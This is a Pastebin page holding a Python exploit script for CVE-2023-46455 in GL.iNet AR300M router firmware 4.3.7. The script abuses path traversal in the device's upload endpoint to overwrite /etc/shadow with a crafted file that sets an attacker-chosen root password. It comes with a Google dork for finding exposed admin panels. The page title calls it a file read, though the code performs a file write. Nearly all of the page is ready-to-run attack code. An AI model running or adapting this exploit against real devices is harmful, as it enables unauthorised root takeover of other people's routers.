Advertisement
FlyFar

GL.iNet AR300M v4.3.7 Arbitrary File Read - CVE-2023-46455

Mar 6th, 2024
621
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.08 KB | Cybersecurity | 0 0
  1. #!/usr/bin/env python3
  2.  
  3. # Exploit Title: GL.iNet <= 4.3.7 Arbitrary File Write
  4. # Google Dork: intitle:"GL.iNet Admin Panel"
  5. # Date: XX/11/2023
  6. # Exploit Author: Michele 'cyberaz0r' Di Bonaventura
  7. # Vendor Homepage: https://www.gli-net.com
  8. # Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar
  9. # Version: 4.3.7
  10. # Tested on: GL.iNet AR300M
  11. # CVE: CVE-2023-46455
  12.  
  13. import crypt
  14. import requests
  15. from sys import argv
  16.  
  17. requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
  18.  
  19. def craft_shadow_file(salted_password):
  20.     shadow_content  = 'root:{}:19459:0:99999:7:::\n'.format(salted_password)
  21.     shadow_content += 'daemon:*:0:0:99999:7:::\n'
  22.     shadow_content += 'ftp:*:0:0:99999:7:::\n'
  23.     shadow_content += 'network:*:0:0:99999:7:::\n'
  24.     shadow_content += 'nobody:*:0:0:99999:7:::\n'
  25.     shadow_content += 'dnsmasq:x:0:0:99999:7:::\n'
  26.     shadow_content += 'stubby:x:0:0:99999:7:::\n'
  27.     shadow_content += 'ntp:x:0:0:99999:7::\n'
  28.     shadow_content += 'mosquitto:x:0:0:99999:7::\n'
  29.     shadow_content += 'logd:x:0:0:99999:7::\n'
  30.     shadow_content += 'ubus:x:0:0:99999:7::\n'
  31.     return shadow_content
  32.  
  33. def replace_shadow_file(url, auth_token, shadow_content):
  34.     data = {
  35.         'sid': (None, auth_token),
  36.         'size': (None, '4'),
  37.         'path': (None, '/tmp/ovpn_upload/../../etc/shadow'),
  38.         'file': ('shadow', shadow_content)
  39.     }
  40.     requests.post(url, files=data, verify=False)
  41.  
  42. def main(base_url, auth_token):
  43.     print('[+] Started GL.iNet <= 4.3.7 Arbitrary File Write exploit')
  44.  
  45.     password = input('[?] New password for root user: ')
  46.     salted_password = crypt.crypt(password, salt=crypt.METHOD_MD5)
  47.  
  48.     shadow_content = craft_shadow_file(salted_password)
  49.     print('[+] Crafted shadow file:\n{}'.format(shadow_content))
  50.  
  51.     print('[*] Replacing shadow file with the crafted one')
  52.     replace_shadow_file(base_url+'/upload', auth_token, shadow_content)
  53.  
  54.     print('[+] Done')
  55.  
  56. if __name__ == '__main__':
  57.     if len(argv) < 3:
  58.         print('Usage: {} <TARGET_URL> <AUTH_TOKEN>'.format(argv[0]))
  59.         exit(1)
  60.  
  61.     main(argv[1], argv[2])
  62.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement